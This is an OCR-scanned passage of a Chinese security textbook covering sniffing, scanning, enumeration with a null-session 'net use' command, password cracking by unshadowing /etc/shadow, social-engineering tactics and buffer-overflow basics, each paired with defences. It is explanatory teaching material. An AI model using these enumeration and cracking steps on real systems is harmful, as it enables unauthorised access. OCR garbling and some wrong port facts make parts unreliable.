网 络 监视 软件 。 网 络 监听 器 还 可 以 设置 个 性 化 显示 竖 列 与 不 同 API 的 显示 颜色 ,以 及 可 以 
将 API 传输 数据 导出 成 二 进 制 文件 ,也 可 以 载 人 或 保存 整个 监视 结果 ,甚至 可 以 查看 进程 
开放 或 连接 了 哪些 IP 与 端口 ,以 及 远程 IP 的 地 理 位 置 。 

4. 网 络 嗅 探 与 监听 工具 

常用 的 嗅 探 器 有 Sniffer、Wireshark(ethereal) 等 。Sniffer 抓 包 如 图 8. 5 所 示 。 

Sniffer 是 一 个 用 于 捕获 网 络 报 文 的 软件 。 它 可 以 用 来 进行 网 络 流量 分 析 , 找 出 网 络 中 
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图 8.5 Sniffer 抓 包 


潜在 问题 ,确定 在 通信 所 使 用 的 多 个 协议 中 ,属于 不 同 协议 的 流量 大 小 , 哪 台 主机 承担 主要 
协议 的 通信 , 哪 台 主 机 是 主要 的 通信 目的 地 , 报 文 发 送 的 时 间 是 多 少 ,主机 间 报 文 传送 的 时 
间 间 隔 等 ,是 网 络 管理 员 的 一 个 常用 工具 。 当 一 段 网 络 运行 不 好 ,速度 较 慢 而 又 找 不 出 问题 
所 在 时 ,用 Sniffer 往往 可 以 做 出 精确 判断 。Sniffer 可 以 捕获 网 络 报 文 这 一 用 处 也 可 以 被 黑 
客 用 来 捕获 网 络 中 传输 的 用 户口 令 金融 账 号 .机 密 或 敏感 数据 ,专用 数据 ,低级 协议 信 


Sniffer Pro。Sniffer Pro 是 NAI 公司 开发 的 一 种 图 形 界 面 嗅 探 器 。 它 功能 强大 ,能 
全 面 监视 所 有 网 络 信息 流量 ,识别 和 解决 网 络 问题 ,是 目前 唯一 能 够 为 七 层 OSI 网 
络 模型 提供 全 面 性 能 管理 的 工具 。 

Libpcap/ Winpcap。Libpcap 是 Packet Capture Library( 数 据 包 捕 获 函 数 库 ) 的 缩写 
与 重组 。 它 不 是 一 个 Sniffer, 但 是 它 提供 的 C 语言 函数 接口 可 用 于 对 经 过 网 络 接 
口 数据 包 的 捕获 ,以 支持 Sniffer 产品 的 开发 。Winpcap 是 Libpcap 的 Win32 版 本 。 
Dsniff。Dsniff 是 Dug Song 编写 的 一 个 功能 强大 的 工具 软件 包 , 它 可 以 支持 多 种 协 
议 类 型 ,包括 FTP, telnet、 rlogin、 Ldap、SMTP,、 Pop、Imap\IRC、ICQ、MS-CHAP、 
Npster, Citrix, ICA、 PCAnywher, SNMP、, OSPF、 PPTP、 X11 NFS, RIP, RIP、 
VRRP ,Oracle SQL * Net,Microsoft SQL protocol 和 Postgre SQL 等 。 

。 Wireshark。Wireshark 不 是 入 侵 侦 测 软 件 , 对 于 网 络 上 的 异常 流量 行为 ,Wireshark 
不 会 产生 警示 或 是 任何 提示 ,只 会 反映 出 目前 流通 的 数据 包 信息 。 对 Wireshark 截 
取 的 数据 包 分 析 能 够 帮助 使 用 者 对 于 网 络 行为 有 更 清楚 的 了 解 。 

Tcpdump/ Windump。Tcpdump 是 一 个 传统 的 嗅 探 器 ,通过 将 网 卡 设置 为 混杂 模式 
截取 帧 进行 工作 。 
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UNIX 环境 下 的 嗅 探 器 是 免费 的 ,并 发 布 源 代码 ,如 sniffit、snoop、tcpdump、dsniff 、 
Ettercap( 交 换 环 境 下 ) Ethereal .Net monitor、EffTech HTTP Sniffer 和 Iris 等 。 

5. 网 络 嗅 探 与 监听 的 检测 

网 络 嗅 探 与 监听 因为 是 被 动 接收 数据 包 , 所 以 很 难 检测 。 但 是 因为 运行 嗅 探 器 软件 会 
使 网 络 负载 加 重 、 网 速 变 慢 , 用 户 容易 感知 。 如 用 ping 命令 等 测试 发 现 网 络 出 现 较 高 的 丢 
包 率 ,通过 带宽 控制 器 观察 网 络 带 宽 反 常 。 有 以 下 几 种 方法 可 以 检测 和 发 现 嗅 探 器 是 否 
运行 。 

(1) 检测 系统 中 的 可 疑 进程 。 在 UNIX 环境 下 执行 命令 ps -aux, 或 在 Windows 环境 
下 按 Ctrl 十 Alt 十 Delete 组 合 键 进入 任务 列表 查看 本 机 可 疑 进 程 ,或 搜索 局 域 网 中 所 有 计算 
机 的 进程 。 

(2) 使 用 ping 命令 对 可 疑 计算 机 发 送 IP 正确 而 MAC 错误 的 数据 包 。 正 常 的 计算 机 
不 会 接收 处 理 这 种 数据 包 , 而 嗅 探 者 会 接收 并 处 理 。 例 如 : 


ping 192.168.1.4 
Arp -a |find "192.168.1.4" 


假设 得 到 的 MAC 为 00000e40b4al ,修改 自己 的 ARP 缓存 表 , 将 192.168.1.4 的 MAC 
改 为 00000e40b4a2 ,再 ping 192. 168.1.4, 正 常情 况 应 该 是 没有 回应 。 如 果 有 回应 说 明 该 主 
机 很 可 能 装 有 嗅 探 器 软件 。 

(3) 使 用 MD5 校 验 工具 ,如 TripWare(http://www. tripware. com) 等 ,发 现 单 机 上 的 
Sniffer。 

(4) 搜索 网 络 ,检查 所 有 计算 机 的 网 卡 是 否 工作 在 混杂 模式 (Promiscuous ) 。 

(5) 搜索 网 络 嗅 探 程序 ,如 使 用 LOph 工具 ,但 这 很 费时 且 困难 。 

6. 嗅 探 与 监听 的 防范 

嗅 探 攻击 属于 第 二 层 攻击 ,入 侵 者 进入 目标 系统 后 ,为 了 获取 更 多 的 信息 而 采用 的 攻击 
手段 。 为 了 达到 好 的 攻击 效果 , 它 要 被 放置 在 被 攻击 对 象 (主机 或 网 络 ) 附 近 的 网 关上 。 防 
范 方法 如 下 : 

(1) 规划 网 络 , 从 人 逻辑 或 物理 上 对 网 络 分 段 。 网 络 分 段 是 控制 网 络 风暴 的 一 种 基本 手 
段 ,也 是 隔离 非法 用 户 和 敏感 资源 ,保证 网 络 安全 的 一 项 措施 。 一 般 将 网 络 分 段 划分 得 越 
细 , 嗅 探 器 收集 到 的 信息 越 少 。 

(2) 使 用 交换 网 络 。 将 网 络 集线器 更 换 为 交换 机 。 

(3) 绑 定 MAC 地 址 。 为 防止 ARP 欺骗 监听 ,将 局 域 网 内 所 有 计算 机 的 IP 和 MAC 绑 
定 。 用 arp -s IP MAC 命令 进行 静态 绑 定 ,形成 静态 MAC 地 址 表 。 

(4) 安全 的 网 络 拓扑 结构 。 对 网 络 划 分 VLAN, 各 VLAN 之 间 都 是 隔离 的 。 这 时 的 计 
算 机 必须 采用 标准 的 TCP/IP 进行 数据 传输 ,无 法 进行 MAC 欺骗 。 

(5) 采用 加 密 通 信 。 加 密 后 ,即使 Sniffer 捕获 了 数据 ,也 难以 获得 数据 的 原文 。 目 前 
比较 流行 的 做 法 是 使 用 IPSec( 网 络 层 )、SSL( 传 输 层 ) 协 议和 SSH( 应 用 层 ) 安 全 产品 。 

(6) 使 用 软件 防御 。 使 用 Anti-Sniffer、promisc 和 cmp(http://www. secrity softwaretech. 
com/antisniff/) 等 ,发 现 大 型 网 络 上 的 Sniffer。 

用 AntiSniff 测试 网 络 接口 有 无 被 设置 成 混杂 模式 ,对 于 SunOS、Linux 和 BSD UNIX 
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可 以 采用 命令 ifconfig -a。 
8.2.3 扫描 


扫描 是 通过 向 目标 主机 发 送 数据 报 文 ,从 响应 中 获得 目标 主机 的 有 关 信 息 。 按 照 扫描 
方式 ,扫描 分 为 三 种 主要 类 型 : 地 址 扫描 端口 扫描 和 漏洞 扫描 。 

1. 地 址 扫描 

地 址 扫描 就 是 判断 某 个 IP 地 址 上 有 无 活动 主机 ,以 及 某 台 主机 是 否 在 线 。 最 简单 的 地 
址 扫描 方法 是 使 用 ping 命令 ,用 ping 命令 向 目标 主机 发 送 ICMP 回 显 请 求 报 文 , 并 等 待 
ICMP 回 显 应 答 。 如 果 ping 不 到 某 台 主机 ,就 表明 它 不 在 线 。ping 命令 的 发 送 可 以 手工 一 
条 一 条 地 进行 ,也 可 以 用 Fping 等 进行 大 范围 的 地 址 扫描 ,得 到 一 个 网 段 中 的 在 线 地 址 列 
表 。 但 是 ,由 于 用 户 安全 意识 的 提高 ,很 多 路 由 器 和 防火 墙 的 规则 中 都 增加 了 丢弃 ICMP 回 
显 请 求 数据 包 ,或 在 主机 中 进行 了 禁止 请 求 应 答 ,使 得 ping 地 址 扫描 难以 进行 。 

2. 端口 扫描 

在 TCP/IP 网 络 中 ,端口 号 是 主机 上 提供 的 服务 标识 。 例 如 ,FTP 服务 的 端口 号 为 21、 
Telnet 服务 的 端口 号 为 23 .DNS 服务 的 端口 号 为 53、Http 服务 的 端口 号 为 80、Smtp 的 端 
口号 为 25、Pop3 的 端口 号 为 110、Imap 的 端口 号 为 143、Ssh 的 端口 号 为 22、MySQL 的 端口 
号 为 3306 等 。 入 侵 者 知道 了 被 攻击 主机 的 地 址 后 ,还 需要 知道 通信 程序 的 端口 号 。 只 要 扫 
描 到 相应 的 端口 打开 着 ,就 知道 目标 主机 上 运行 着 什么 服务 ,以 便 采取 针对 这 些 服务 的 攻击 
手段 。 

3. 漏洞 扫描 

漏洞 (Vulnerability) 是 指 系统 中 存在 的 一 些 功能 性 或 安全 性 的 逻辑 缺陷 ,包括 一 切 导 
致 威胁 .损坏 计算 机 系统 安全 性 的 所 有 因素 ,是 计算 机 系统 在 硬件 .软件 .协议 的 具体 实现 或 
系统 安全 策略 上 存在 的 缺陷 和 不 足 。 漏 洞 的 存在 不 可 避免 ,一 旦 某 些 较 严重 的 漏洞 被 攻击 
者 发 现 ,就 有 可 能 被 其 利用 ,在 未 授权 的 情况 下 访问 或 破坏 计算 机 系统 。 先 于 攻击 者 发 现 并 
及 时 修补 漏洞 可 有 效 减 少 来 自 网 络 的 威胁 。 入 侵 者 通过 扫描 能 够 发 现 可 以 利用 的 漏洞 ,并 
进一步 通过 漏洞 收集 有 用 信息 或 直接 对 系统 实施 威胁 。 

漏洞 扫描 就 是 自动 检测 计算 机 网 络 系统 在 安全 方面 存在 的 可 能 被 黑客 利用 的 脆弱 点 。 
漏洞 扫描 技术 通过 安全 扫描 程序 实现 。 管 理 人 员 可 以 通过 扫描 对 所 管理 的 系统 和 网 络 进 行 
安全 审计 ,检测 系统 中 的 安全 肥 弱 环节 。 

4. 扫描 策略 

所 谓 扫描 ,包含 了 非 破坏 性 原则 , 即 不 对 网 络 造成 任何 破坏 。 在 实施 策略 上 可 以 采用 被 
动 式 和 主动 式 两 种 策略 。 

1) 被 动 式 扫描 策略 。 被 动 式 扫描 策略 主要 检测 系统 中 不 合适 的 设置 .脆弱 的 口令 以 及 
同安 全 规则 相抵 触 的 对 象 ,具体 还 可 以 分 为 如 下 几 类 : 

(1) 基于 主机 的 扫描 技术 。 通 常 它 涉及 系统 的 内 核 文件 的 属性 、 操 作 系 统 的 补丁 等 问 
题 ,能 把 一 些 简单 的 口令 解密 和 剔除 ,能 非常 准确 地 定位 系统 存在 的 问题 ,发 现 漏洞 。 缺 点 
是 与 平台 相关 ,升级 复杂 。 

(2) 基于 目标 的 扫描 技术 。 基 本 原理 是 基于 消息 加 密 算 法 和 哈 希 函 数 ,这 样 ,文件 和 数 
据 流 的 细微 变化 就 会 被 感知 。 基 于 目标 的 扫描 技术 通常 用 于 检测 系统 属性 和 文件 属性 ,如 
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数据 库 \ 注 册 号 等 。 由 于 这 种 技术 的 加 密 强度 极 大 ,不 易 受 攻击 ,比较 安全 和 可 靠 。 

(3) 基于 应 用 的 扫描 技术 。 主 要 用 于 检查 应 用 软件 包 的 设置 和 安全 漏洞 。 

2) 主动 式 扫描 策略 。 主 要 是 基于 网 络 的 扫描 技术 ,通过 一 些 脚 本 文件 从 网 络 模 拟 对 系 
统 进行 攻击 ,记录 系统 的 反应 ,从 中 发 现 漏洞 。 

5. 扫描 步骤 

网 络 安全 扫描 可 分 为 三 个 阶段 : 

(1) 目标 发 现 。 扫 描 网 络 中 的 目标 计算 机 地 址 ,发 现存 活 计算 机 。 还 可 以 发 现 目标 网 
络 的 拓扑 结构 、 路 由 和 主机 等 信息 。 

(2) 标示 服务 和 系统 类 型 。 扫 描 目 标 计算 机 的 端口 ,发 现 开 放 的 服务 以 及 所 运行 的 操 
作 系 统 类 型 与 版 本 。 

(3) 检查 安全 漏洞 。 漏 洞 扫描 可 以 进一步 确认 目标 系统 的 安全 漏洞 。 

6. 扫描 工具 

扫描 器 是 自动 检测 远程 或 本 地 主机 安全 性 弱点 的 程序 , 它 不 仅 是 黑客 们 的 作案 工具 ,也 
是 管理 人 员 维 护 网 络 安全 的 有 力 工 具 。 主 要 用 于 收集 系统 信息 (远程 操作 系统 的 识别 、 网 络 
结构 的 分 析 以 及 其 他 敏感 信息 的 收集 ) 和 发 现 漏洞 。 

常用 的 扫描 器 很 多 ,如 Ping 扫描 、Xscan、Fluxy、 Nmap、superscan、 网 络 安全 扫描 器 
NSS ,超级 优化 TCP 端口 检测 程序 Strobe、 安 全 管理 员 网 络 分 析 工 具 SATAN 等 。 


8.2.4 查 点 


查 点 是 检查 目标 系统 可 以 攻击 和 入 侵 的 弱点 。 如 果 查 询 .扫描 阶段 并 没有 找到 可 以 发 
动 进攻 的 进攻 点 ,那么 就 需要 继续 收集 信息 来 分 析 目标 系统 的 漏洞 ,这 一 阶段 称 为 查 点 。 

1. 分 析 扫描 结果 

对 扫描 出 的 NETBOIS 域名 、 机 器 名 、IP 地 址 和 端口 进行 分 析 , 找 出 容易 出 现 漏洞 的 服 
务 。 如 53 端口 的 DNS 域名 解析 服务 ,153 端口 的 微软 RPC 窃听 端口 映射 服务 ,137 端口 的 
NBNS NETBOIS 域名 机 器 名 解析 服务 ,139 端口 的 NETBOIS 上 的 共享 服务 ,445 端口 的 
TCP 的 SMB 服务 直接 主机 ,161 端口 的 SNMP 简单 网 络 管理 协议 ,3389 端口 的 转型 目录 
访问 协议 ,3268 端口 的 全 局 分 类 目录 服务 。 

2. 旗 标 获取 

族 标 是 目标 系统 提供 的 服务 及 版 本 号 。 旗 标 获取 是 通过 一 个 打开 的 端口 来 联系 和 识 
别 。 如 连接 到 一 个 端口 , 按 几 次 Enter 键 ,根据 返回 的 信息 判断 服务 及 版 本 。 

3. 操作 系统 检测 

许多 漏洞 与 操作 系统 有 关 。 因 此 ,黑客 首先 要 确定 操作 系统 的 类 型 。 操 作 系统 检测 按 
技术 原理 可 以 分 为 利用 系统 旗 标 信息 和 利用 TCP/IP 堆栈 指纹 两 种 , 按 鉴别 的 主动 性 可 以 
分 为 主动 鉴别 和 被 动 鉴别 。 

目前 常用 的 操作 系统 检测 工具 有 Nmap、Queso 和 Siphon 等 。 

4. NETBOIS NAME SERVICE 查 点 

命令 C:\ 之 NET VIEW/DOMAIN: workgroup 可 以 查看 在 域 里 的 计算 机 。 
NBTSTAT 查 点 工具 能 够 查询 出 某 个 远程 系统 的 NETBOIS 清单 ,包括 机 器 名 称 、 所 在 域 工 
作 组 和 MAC 地址。NBTSCAN 查 点 工具 每 次 只 能 对 一 台 机 器 实施 操作 。 
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5. RPC 查 点 

开放 在 TCP135 端口 上 的 MSRPC 同样 是 比较 容易 泄密 的 一 项 服务 。 例 如 epdump、 
Rpcdump 等 查 点 工具 能 够 得 出 RPC 接口 中 的 信息 项 。 

6. SMB 查 点 

(1) NET USE 建立 空 链接 。 如 果 黑 客 通过 端口 扫描 发 现 某 个 远程 系统 开放 了 
TCP139 或 445 端口 ,就 可 以 通过 “Net use\\ 目 标 IP\IPC$ ?建立 一 条 合法 的 空 链接 。 最 好 
在 本 地 机 器 上 也 开放 139 端口 ,使 得 上 述 命令 得 以 成 功 。 

(2) NET VIEW 查看 共享 卷 。 在 建立 好 空 链接 后 ,就 可 以 用 NET VIEW 查看 远程 端 
口上 的 共享 卷 信息 。 

(3) NLTEST 查看 域 信赖 关系 。C: 惟 之 NLTEST /<< server: 必 server_name 之 二/ 
domain_trusts。 

由 于 虚拟 机 和 操作 系统 改进 的 关系 ,上 述 的 命令 不 易 成 功 ,这 个 漏洞 已 经 很 难 利 用 了 。 
可 以 使 用 相应 的 工具 ,如 DUMPSEC、GETACCT 等 。 

7. SNMP 查 点 

通过 RESOURCE KIT 工具 包 中 的 SNMPUTIL 工具 ,可 以 轻易 地 通过 SNMP 服务 ， 
将 Windows 账户 信息 提取 到 手 。 

8. 主要 查 点 工具 

适用 于 Windows 系统 的 除了 命令 net view、nbtstat、nbtscan 和 nltest 外 ,还 有 第 三 方 
工具 Netviewx、Userdump、User2sid、GetAcct、DumpSec、Legion 和 NAT。 

UNIX 系统 上 常用 的 查 点 工具 有 rpcinfo、 rpcdump、 shomount, finger、 rwho、 ruser、 
nmap ,telnet\nc 和 snmpwalk 等 。 


8.3 人 侵 类 攻击 


8.3.1 口令 攻击 


口令 机 制 是 资源 访问 的 第 一 道 屏障 ,攻破 了 这 道 屏障 就 获得 了 进入 系统 的 第 一 道 大 门 ， 
所 以 口令 攻击 是 入 侵 者 最 常用 的 攻击 手段 。 口 令 攻 击 可 以 从 破解 口令 和 屏 项 口令 保护 两 个 
方面 进行 。 

1. 口令 破解 的 基本 技术 

口令 破解 首先 要 获取 口令 文件 ,然后 采取 一 定 的 攻击 技术 进行 口令 的 破解 。 

(1) 字典 猜测 破解 法 。 攻 击 者 基于 某 些 知识 ,编写 出 口令 字典 ,然后 对 字典 进行 穷 举 或 
猜测 攻击 。Internet 上 已 经 提供 了 一 些 口 令 字 典 , 从 一 万 到 几 十 万 条 ,可 以 下 载 ,如 表 8.1 
所 示 。 此 外 ,还 有 一 些 可 以 生成 口令 字典 的 程序 。 利 用 口令 字典 可 以 通过 猜测 方式 进行 口 
令 破解 攻击 。 

(2) 穷 举 破解 法 。 有 人 认为 使 用 足够 长 的 口令 或 者 使 用 足够 完善 的 加 密 模式 就 会 攻 不 
破 。 事实 上 没有 攻 不 破 的 口令 ,这 只 是 个 时 间 问 题 。 如 果 有 速度 足够 快 的 计算 机 能 尝试 字 
母 ,数字 ,特殊 字符 所 有 的 组 合 , 最 终 将 能 破解 所 有 的 口令 。 这 种 类 型 的 攻击 方式 通过 穷 举 
口令 空间 获得 用 户口 令 称 为 穷 举 破解 法 或 蛮 力 破解 ,也 叫 强行 攻击 。 如 先 从 字母 a 开始 , 尝 
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试 aa ab ,ac 等 ,然后 尝试 aaa ,aab ,aac 等 。 
攻击 者 也 可 以 利用 分 布 式 攻击 。 如 果 攻 击 者 希望 在 尽量 短 的 时 间 内 破解 口令 ,也 可 能 


会 求助 几 个 有 大 批 计算 机 的 公司 并 利用 他 们 的 资源 破解 口令 。 
表 8.1 口令 字典 猜测 破解 法 
序号 口令 类 型 实例 序号 口令 类 型 实 例 
1 | 规范 单词 Computer 19 | 医药 词汇 Vitamin 
2 | 反 写 规范 单词 retupmoc 20 | 技术 词汇 Ruter 
3 | 词 首 正规 大 写 Computer 21 | 商品 beer 
4 | 反 拼 写 反 大 写 computeR 22 | 用 户 标识 符 woode 
5 | 缩写 TCP 23 | 反 写 用 户 标识 符 cdoow 
6 | 带 点 缩写 TCP 24 | 串 接 用 户 标识 符 woodc-woodc 
7 | 缩写 后 带 点 TCP. 25 | 截 短 用 户 标 识 符 woo 
8 | 略 写 etc 26 | 串 接 用 户 标识 符 并 截 短 | woodewood 
9 | 专 有 名 词 缩写 , 带 点 Ph. D 27 | 单字 符 构成 串 bbbbbb 
10 | 专 有 名 词 缩写 ,不 全 大 写 | kHz 28 | 键盘 字母 asdfgh 
11 | 姓 Bush 29 | 文化 名 人 Beethoven 
12 | 名 Tom 30 | 年 月 日 040723 
13 | 所 有 格 Bob's 31 | 电话 号 码 5863583 
14 | 动词 变化 seeyseesysawvseen | 32 | 邮政 编码 214036 
15 | 复数 books 33 | 证 件 号 码 20010612345 
16 | 法 律 用 语 legal 34 | 门牌 号 码 AB3579 
17 | 地 名 ( 域 / 街 / 山 / 河 等 ) | Beijing 35 | 车 牌号 码 苏 。W12345 
18 | 生物 词汇 Dog 
(3) 组 合 破解 法 。 词 典 破解 法 只 能 发 现 词典 单词 口令 ,但 是 速度 快 。 穷 举 破解 法 能 发 


现 所 有 的 口令 ,但 是 破解 时 间 很 长 。 鉴 于 很 多 管理 员 要 求 用 户 使 用 字母 和 数字 ,用 户 的 对 策 


是 在 


口令 后 面 添加 几 个 数字 ,如 把 口令 computer 变 成 computer99。 使 用 强行 破解 法 又 非 


常 费 时 间 。 由 于 实际 使 用 的 口令 常常 很 弱 ( 可 以 通过 对 字典 或 常用 字符 列表 进行 搜索 或 经 
过 简单 置换 而 发 现 的 口令 ), 这 时 可 以 基于 词典 单词 而 在 单词 尾部 串 接 几 个 字母 和 数字 ,就 


是 组 
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2. 社会 工程 学 的 口令 攻击 
利用 社会 工程 学 通过 对 目标 系统 的 人 员 进 行 游说 欺骗 .利诱 而 获得 口令 。 社 会 工程 学 
所 研究 的 对 象 不 是 严谨 的 计算 机 技术 ,而 是 目标 网 络 的 人 员 和 运行 管理 制度 ,主要 是 通过 和 
人 交流 或 其 他 互动 方式 实现 的 ,利用 说 服 或 欺骗 的 方法 来 获得 对 信息 系统 的 访问 。 包 括 偷 
敌 ( 观 察 别人 输入 口令 ) ,搜索 垃圾 箱 。 作 为 一 种 重要 的 信息 搜集 的 方式 ,在 黑客 攻击 的 信息 
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收集 阶段 被 广泛 采用 。 

信任 是 一 切 安全 的 基础 。 黑 客 聪明 利用 人 类 天 性 趋 于 信任 倾向 ,愿意 相信 其 他 人 的 说 
辞 。 一 般 认为 对 于 保护 与 审核 的 信任 是 整个 安全 链 中 最 薄弱 的 一 环 , 黑 客 的 目标 是 获得 信 
息 或 重要 系统 未 授权 的 访问 路 径 。 社 会 工程 学 让 大 多 数 人 容易 被 这 种 手段 所 利用 。 社 会 工 
程 学 类 的 攻击 分 为 物理 上 的 和 心理 上 的 。 

1) 社会 工程 学 的 物理 分 析 。 和 人 侵 发 生 的 物理 地 点 可 以 是 工作 区 .电话 .目标 企业 垃圾 
堆 , 甚 至 是 在 网 上 。 

(1) 黑客 可 以 简单 地 走 进 工作 区 ,冒充 允许 进入 公司 的 维护 人 员 或 是 顾问 ,通过 观察 或 
偷窥 ,直到 找到 一 些 密码 或 是 一 些 可 以 利用 的 资料 之 后 离开 。 如 站 在 工作 区 观察 公司 雇员 
如 何 输入 密码 并 偷偷 记 住 。 

(2) 通过 电话 进行 索取 。 黑 客 可 以 冒充 一 个 权力 很 大 或 是 很 重要 人 物 的 身份 , 打 电话 
从 其 他 用 户 那里 获得 信息 。 一 般 机 构 的 咨询 台 容易 成 为 这 类 攻击 的 目标 。 

(3) 翻 垃圾 是 另 一 种 常用 的 社会 工程 学 手段 。 在 垃圾 堆 中 可 以 找 出 很 多 危害 安全 的 信 
息 ,包括 企业 的 电话 短 、 机 构 表格 和 备忘录 等 ,获得 有 用 信息 来 帮助 他 们 扮演 可 信任 的 身份 。 

(4) 利用 Internet 获取 账号 和 密码 。 发 送 某 种 彩票 中 奖 的 消息 给 用 户 , 然 后 要 求 用 户 
输入 姓名 (以 及 电子 邮件 地 址 ) 和 密码 ;冒充 为 该 网 络 的 管理 员 ,通过 电子 邮件 向 用 户 索要 密 
码 ;放置 弹出 窗口 ,看 起 来 像 是 整个 网 站 的 一 部 分 ,声称 是 用 来 解决 某 些 问题 的 , 诱 使 用 户 重 
新 输入 账号 与 密码 。 由 于 很 多 用 户 在 互联 网 的 各 种 账号 都 使 用 同一 密码 ,黑客 一 旦 获得 其 
中 一 个 ,就 获得 了 多 个 账号 的 使 用 权 。 

(5) 利用 电子 邮件 。 附 件 中 可 能 携带 病毒 .蠕虫 或 者 木马 的 邮件 。 

2) 社会 工程 学 的 心理 分 析 。 利 用 用 户 的 心理 ,从 心理 学 角度 进行 社会 工程 学 攻击 , 手 
段 包 括 扮演 ,讨好 ,同情 和 拉关系 等 ,以 说 服 目 标 汇 露 所 需 敏 感 信息 。 

(1) 扮演 一 般 来 讲 是 构造 某 种 类 型 的 角色 并 按 该 角色 的 身份 行事 。 包 括 维修 人 员 、 技 
术 支 持 人 员 ,经 理 \ 可 信 的 第 三 方 人 员 或 者 企业 同事 。 角 色 通 常 是 越 简 单 越 好 。 

(2) 简单 地 表现 出 友善 和 恭维 的 一 面 来 套 取信 息 。 

(3)“ 反 向 社会 工程 学 ?是 高 级 手段 ,包括 三 个 部 分 : 暗中 破坏 、 自 我 推销 和 进行 帮助 。 
黑客 会 扮演 一 个 不 存在 的 但 是 权利 很 大 的 人 物 , 让 企业 雇员 主动 地 向 他 询问 信息 。 

3. UNIX 系统 的 口令 攻击 

Windows 的 用 户口 令 存放 在 %\\windows\system32\SAM 文件 中 ,而 UNIX 系统 用 户 
的 口令 本 来 是 经 加 密 后 保存 在 一 个 文本 文件 passwd 中 ,一 般 存放 在 /etc 目录 下 ,后 来 由 于 
安全 的 需要 ,把 passwd 文件 中 与 用 户口 令 相 关 的 域 提 取出 来 ,组 织 成 文件 shadow, 并 规定 
只 有 超级 用 户 才 能 读 取 。 这 种 分 离 工 作 也 称 为 shadow 变换 。 因 此 ,在 破解 口令 时 ,需要 作 
UnShadow 变换 ,将 /etc/passwd 与 /etc/shadow 合并 起 来 ,在 此 基础 上 才 开 始 进 行 口 令 的 
破解 。 

真正 的 加 密 口令 一 般 是 很 难 逆向 破解 的 ,黑客 们 常用 的 口令 入 侵 工具 所 采用 的 技术 是 
仿真 对 比 , 利 用 与 原 口令 程序 相同 的 方法 ,通过 对 比分 析 , 用 不 同 的 加 密 口令 去 匹配 原 口令 。 
下 面 是 口令 破解 工具 Crack 的 主要 工作 流程 。 

它 采用 逆向 比较 法 进行 口令 破解 : 

(1) 准备 。 对 口令 文件 作 UnShadow 变换 。 
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(2) 下 载 或 自己 生成 一 个 字典 文件 。 
(3) 穷 举 出 口令 字典 中 的 每 个 条 目 ,对 每 个 单词 运用 一 系列 规则 。 规 则 可 以 多 种 多 样 ， 


规则 越 多 ,破译 时 间 越 长 ,但 成 功率 越 高 。 典 型 的 口令 生成 规则 有 : 使 用 几 个 单词 或 数字 的 


组 合 


;大 小 写 交 蔡 使 用 ;把 单词 正 向 ` 反 向 拼写 后 接 在 一 起 ;在 单词 的 开头 或 结尾 加 上 一 些 


数字 。 


(4) 调用 crypt() 函数 对 使 用 规则 生成 的 字符 串 进行 加 密 变换 。 

(5) 用 一 组 子 程序 打开 口令 文件 ,取出 密 文 口令 ,与 crypt() 函 数 的 输出 进行 比较 。 

(6) 循环 (3)、(4) 两 步 ,直到 口令 破解 成 功 。 

4. 网 络 服务 口令 攻击 

网 络 服务 口令 攻击 往往 是 一 种 远程 在 线 攻击 ,攻击 过 程 大 致 如 下 : 

(1) 建立 与 目标 网 络 服务 的 网 络 连接 。 

(2) 选取 一 个 用 户 列表 文件 和 一 个 字典 文件 。 

(3) 在 用 户 列 表 文件 和 一 个 字典 文件 中 选取 一 组 用 户 和 口令 ,按照 网 络 服务 协议 规定 ， 


将 用 户 名 和 口令 发 给 目标 网 络 服务 端口 。 


(4) 检测 远程 服务 返回 信息 ,确定 口令 尝试 是 否 成 功 。 

(5) 循环 (2) 一 (4) 步 ,直到 口令 破解 成 功 。 

5. 口令 破解 的 防范 

口令 攻击 的 成 功 与 否 取决 于 多 种 因素 ,如 口令 长 度 . 口 令 有 效 期 .口令 加 密 算法 的 加 密 


强度 .口令 系统 的 安全 机 制 等 。 此 外 ,采用 增强 口令 安全 性 的 措施 有 : 


(1) 除 进 行 口令 验证 外 ,还 应 使 口令 完全 不 可 读 ( 包 括 超级 用 户 ) 。 
(2) 在 选择 密码 时 就 对 密码 进行 过 滤 ,使 用 口令 破解 程序 检查 口令 的 强度 。 
(3) 对 字典 或 字符 列表 进行 扫描 ,剔除 用 户 选 择 的 弱 口 令 。 

(4) 采用 口令 与 智能 卡 结合 的 方式 登录 系统 。 

(5) 使 用 一 次 性 口令 。 

(6) 对 于 UNIX 的 /etc/passwd、/etc/shadow 文件 单项 加 密 。 
(7) 删除 没有 密码 的 账号 ,不 容许 空 口令 账号 。 

(8) 要 求 用 户 定期 更 改口 令 。 

(9) 使 用 复杂 的 口令 ,长 度 大 于 8 个 字符 ,包含 数字 和 字符 。 

(10) 不 使 用 字典 中 的 单词 。 

(11) 改变 Administrator 账号 。 

(12) 禁止 Administrator 和 root 在 控制 台 以 外 的 地 方 登录 。 


8.3.2 缓冲 区 溢出 攻击 


间 。 


1. 概念 

缓冲 区 是 程序 运行 时 在 内 存 中 为 保存 给 定 类 型 的 数据 而 开辟 的 一 个 连续 且 有 限 的 空 
当 程 序 运 行 过 程 中 要 放 人 缓冲 区 的 数据 过 多 时 ,就 会 产生 缓冲 区 溢出 。 

缓冲 区 溢出 攻击 不 是 一 种 窃 密 和 欺骗 的 手段 ,而 是 从 计算 机 系统 的 最 底层 发 起 攻击 , 因 


此 在 它 的 攻击 下 系统 的 身份 验证 和 访问 权限 等 安全 策略 形同虚设 ;同时 ,由 于 攻击 者 传输 的 
数据 分 组 并 无 异常 特征 ,没有 任何 欺骗 , 且 用 来 实施 缓存 器 溢出 攻击 的 字符 串 非常 多 样 化 ， 
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无 法 与 正常 数据 有 效 进 行 区 分 ,因而 传统 安全 工具 (如 防火 墙 ) 对 这 种 攻击 方式 也 无 能 为 力 。 

缓冲 区 溢出 漏洞 是 一 种 很 普遍 的 漏洞 。 例 如 SQL Slammer 蠕虫 王 的 发 作 原 理 ,就 是 利 
用 未 及 时 更 新 补丁 的 MS SQL Server 数据 库 缓冲 区 溢出 漏洞 。 采 用 不 正确 的 方式 将 数据 
发 到 MS SQL Server 的 监听 端口 ,这 个 错误 可 以 引起 缓冲 区 溢出 攻击 。 

黑客 如 果 成 功利 用 缓冲 漏洞 ,就 有 可 能 获得 对 远程 计算 机 的 完全 控制 ,并 以 本 地 系统 权 
限 执 行 任意 指令 ,如 安装 程序 、 查 看 或 更 改 、 删 除数 据 \ 格 式 化 硬盘 等 ,危害 性 不 言 而 喻 。 

2. 缓冲 区 溢出 的 基本 原理 

